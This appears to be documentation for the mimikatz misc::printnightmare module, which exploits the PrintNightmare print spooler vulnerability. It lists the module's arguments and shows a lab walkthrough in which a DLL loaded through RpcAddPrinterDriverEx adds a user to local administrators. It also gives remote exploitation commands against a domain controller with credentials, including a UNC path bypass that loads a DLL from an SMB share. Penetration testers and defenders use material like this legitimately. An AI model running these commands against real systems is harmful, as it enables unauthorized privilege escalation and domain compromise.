printnightmare

misc::printnightmare can be used to exploit the PrintNightMare vulnerability in both [MS-RPRN RpcAddPrinterDriverEx] and [MS-PAR AddPrinterDriverEx]. The bug was discovered by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370). The MS-PAR function was discovered by cube0x0. It has the following command line arguments:

  • /server: the target server or workstation to exploit

  • /x64 or /win64: the target server or workstation is 64 bit

  • /x86 or /win32: the target server or workstation is 32 bit

  • /library: the DLL to use during exploitation

  • /authuser: the username to use during exploitation

  • /authdomain: the active directory domain

  • /authpassword: the password of the user

  • /clean: clean-up the operation

The following example demonstrates local privilege escalation through printnightmare. As can be seen, the test user is not part of the local administrators group on the Win10.hacklab.local machine:

PS C:\Users\m3g9tr0n> net user

User accounts for \\WIN10

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
test                     vs2022                   WDAGUtilityAccount
The command completed successfully.

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
vs2022
The command completed successfully.

After successful exploitation of printnightmare:

mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll
[ms-rprn/ncalrpc] local
> RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64
| mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll
> RpcAddPrinterDriverEx: OK!
> RpcDeletePrinterDriverEx: OK!

The test user is now part of the local administrators group:

PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
test
vs2022
The command completed successfully.

For remote exploitation, the following can be used:

mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local

With the UNC path bypass:

mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local

Last updated